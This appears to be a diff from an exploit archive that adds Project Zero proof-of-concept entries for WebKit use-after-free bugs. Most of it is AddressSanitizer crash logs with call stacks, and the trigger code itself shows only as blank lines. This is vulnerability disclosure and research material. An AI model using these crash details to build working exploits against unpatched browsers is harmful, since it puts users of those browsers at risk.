(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a5d0) + #41 0x111751693 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x857693) + #42 0x111712736 in 
WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #43 0x11118e047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #44 0x111186df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #45 0x113c5e661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #46 0x107c4643b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #47 0x107c496d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #48 0x107c48bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #49 0x10743a117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #50 0x107219695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #51 0x107222a48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + #52 
0x11e079842 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d22842) + #53 0x11e07a1b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1) + #54 0x7fffd52af320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320) + #55 0x7fffd529021c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c) + #56 0x7fffd528f715 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715) + #57 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #58 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #59 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #60 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #61 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #62 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #63 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #64 0x7fffd2d47e0d in NSApplicationMain 
(/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #65 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #66 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #67 0x10712056c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #68 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x60800005dca8 is located 8 bytes inside of 88-byte region [0x60800005dca0,0x60800005dcf8) +freed by thread T0 here: + #0 0x10a37e294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) + #1 0x11e0c9650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) + #2 0x111c873a8 in WebCore::HTMLInputElement::updateType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd8d3a8) + #3 0x111c887b5 in WebCore::HTMLInputElement::parseAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd8e7b5) + #4 0x111847538 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94d538) + #5 0x111855711 in WebCore::Element::didModifyAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95b711) + #6 
0x111846fef in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cfef) + #7 0x1126f1366 in WebCore::setJSHTMLInputElementTypeSetter(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17f7366) + #8 0x1126e7e57 in bool WebCore::IDLAttribute::set<&(WebCore::setJSHTMLInputElementTypeSetter(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17ede57) + #9 0x11cd05e48 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aee48) + #10 0x11cd05f77 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aef77) + #11 0x11d80a008 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14b3008) + #12 0x11d9e0655 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1689655) + #13 0x11d9fe4f4 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a74f4) + #14 
0x11da01dd7 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aadd7) + #15 0x11d9faf6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #16 0x11d65e847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #17 0x11d5df88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #18 0x11cbf8731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #19 0x11cbf89a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #20 0x11cbf8d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #21 0x112138615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #22 0x11254b6cd in 
WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #23 0x1118b7010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #24 0x1118b6ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #25 0x11187eb97 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984b97) + #26 0x11187ef3e in WebCore::MouseOrFocusEventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984f3e) + #27 0x11187fb2f in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985b2f) + #28 0x11187f553 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985553) + #29 0x11184fe15 in WebCore::Element::dispatchFocusEvent(WTF::RefPtr&&, WebCore::FocusDirection) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x955e15) + +previously allocated by thread T0 here: + #0 0x10a37dd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11e0c9ad4 in 
bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x11e0c7d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x11e04e247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11e04d63a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x111f09398 in WebCore::InputType::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x100f398) + #7 0x111f09059 in std::__1::unique_ptr > WebCore::createInputType(WebCore::HTMLInputElement&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x100f059) + #8 0x111f03bbb in WebCore::InputType::create(WebCore::HTMLInputElement&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1009bbb) + #9 0x111c89e0a in WebCore::HTMLInputElement::initializeInputType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd8fe0a) + #10 0x1118488aa in WebCore::Element::parserSetAttributes(WTF::Vector const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94e8aa) + #11 0x111c09da3 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0fda3) + #12 0x111c08ff7 in 
WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0eff7) + #13 0x111c0a413 in WebCore::HTMLConstructionSite::insertSelfClosingHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd10413) + #14 0x111d724eb in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe784eb) + #15 0x111d6ef13 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe74f13) + #16 0x111d6cd0e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe72d0e) + #17 0x111c35c8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a) + #18 0x111c35849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849) + #19 0x111c349c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2) + #20 0x111c364e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8) + #21 0x111614531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531) + #22 0x11175163d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d) + #23 0x111712736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #24 0x11118e047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #25 0x111186df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #26 0x113c5e661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #27 0x107c4643b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #28 0x107c496d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #29 0x107c48bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + +SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20654a) in WebCore::InputType::element() const +Shadow bytes around the buggy address: + 0x1c100000bb40: fa fa fa fa fd fd fd fd fd fd 
fd fd fd fd fd fa + 0x1c100000bb50: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa + 0x1c100000bb60: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa + 0x1c100000bb70: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c100000bb80: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x1c100000bb90: fa fa fa fa fd[fd]fd fd fd fd fd fd fd fd fd fa + 0x1c100000bba0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c100000bbb0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c100000bbc0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c100000bbd0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa + 0x1c100000bbe0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29682==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43168.js b/platforms/multiple/dos/43168.js new file mode 100644 index 000000000..fd4abfd5b --- /dev/null +++ b/platforms/multiple/dos/43168.js @@ -0,0 +1,218 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1346 + +There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + + + + + +
+ +
+
+ + + + + + +/* +================================================================= + +ASan log: + +================================================================= +==29700==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000149b24 at pc 0x00010fbb202a bp 0x7fff5f325d30 sp 0x7fff5f325d28 +READ of size 4 at 0x607000149b24 thread T0 +==29700==WARNING: invalid path to external symbolizer! +==29700==WARNING: Failed to use and restart external symbolizer! + #0 0x10fbb2029 in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa029) + #1 0x10fbbca5d in WebCore::Node::firstChild() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x14a5d) + #2 0x10fcc7f58 in WebCore::Node::hasChildNodes() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11ff58) + #3 0x112068f8d in WebCore::PositionIterator::decrement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24c0f8d) + #4 0x110492193 in WebCore::previousCandidate(WebCore::Position const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8ea193) + #5 0x112c860e4 in WebCore::VisiblePosition::canonicalPosition(WebCore::Position const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30de0e4) + #6 0x112c85dc7 in WebCore::VisiblePosition::init(WebCore::Position const&, WebCore::EAffinity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30dddc7) + #7 0x112c8cfde in WebCore::VisibleSelection::setBaseAndExtentToDeepEquivalents() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30e4fde) + #8 0x112c8b43f in 
WebCore::VisibleSelection::validate(WebCore::TextGranularity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30e343f) + #9 0x112c8b986 in WebCore::VisibleSelection::selectionFromContentsOfNode(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x30e3986) + #10 0x11071c1f2 in WebCore::FrameSelection::selectAll() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb741f2) + #11 0x1104de2b0 in WebCore::executeSelectAll(WebCore::Frame&, WebCore::Event*, WebCore::EditorCommandSource, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9362b0) + #12 0x1104d8ab3 in WebCore::Editor::Command::execute(WTF::String const&, WebCore::Event*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x930ab3) + #13 0x11035900a in WebCore::Document::execCommand(WTF::String const&, bool, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b100a) + #14 0x110f4e593 in WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13a6593) + #15 0x110f36068 in long long WebCore::IDLOperation::call<&(WebCore::jsDocumentPrototypeFunctionExecCommandBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x138e068) + #16 0x43f9a9401027 () + #17 0x1084ace49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #18 0x1084ace49 in llint_entry 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #19 0x1084a5f6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #20 0x108109847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #21 0x10808a88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #22 0x1076a3731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #23 0x1076a39a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #24 0x1076a3d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #25 0x110de6615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #26 0x1111f96cd in 
WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #27 0x110565010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #28 0x110564ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #29 0x110442051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051) + #30 0x110451c0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f) + #31 0x110344b0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f) + #32 0x11033ebad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad) + #33 0x1106f13ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed) + #34 0x1106ee75c in WebCore::FrameLoader::finishedParsing() 